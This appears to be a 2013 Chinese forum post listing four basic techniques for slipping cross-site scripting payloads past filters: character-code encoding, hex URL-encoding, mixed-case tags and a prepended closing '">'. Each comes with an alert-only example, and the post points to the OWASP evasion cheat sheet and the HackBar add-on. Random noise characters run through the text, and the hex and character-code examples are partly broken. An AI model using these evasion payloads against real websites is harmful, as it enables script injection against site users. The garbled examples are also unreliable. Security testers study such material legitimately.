四种超级基础的绕过方法。
- X3 ?7 M% H# e# K: ~1.转换为ASCII码9 e$ \5 l& I% ^" }- A
例子:原脚本为<script>alert(‘I love F4ck’)</script >
( ~6 v# H: C5 m( v8 b+ l通过转换,变成:
. Y$ p4 l8 E! B: B<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
, K B3 R+ `/ Q& l; w$ x- ~
/ P! o! t7 f5 E4 v; i1 b# x2.转换为HEX(十六进制)
$ t5 Y2 K, |. e* h7 Y例子:原脚本为<script>alert(‘I love F4ck’)</script>
' A. A' }: Q. O. Z通过转换,变成:
. F) r0 A' {, A* X%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e3 V: s6 W+ N& c$ n: k
5 ~/ u8 N1 l. l+ T0 ^$ a
3.转换脚本的大小写
: ^0 A" ^6 Y% v& V例子:原脚本为<script>alert(‘I love F4ck’)</script>
9 O* p0 s8 h8 z: Z0 H$ d转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
" C5 Z% ]8 [: i0 S+ P2 A; `) L
- g, ?$ S6 w& `% M& t* m+ h4.增加闭合标记”>' G+ s- O4 c( X# u( D/ s6 b
例子:原脚本为<script>alert(‘I love F4ck’)</script>( [2 }, {0 U ]( Q
转换为:”><script>alert(‘I love F4ck’)</script>3 K4 c& Z8 r9 q, g/ e( t, _
更详细绕过技术请参考此网页. Z. ?& p5 ^" o
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet; R$ |* j1 Y) E7 @& u p: f
0 I( q8 O% B H4 i转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对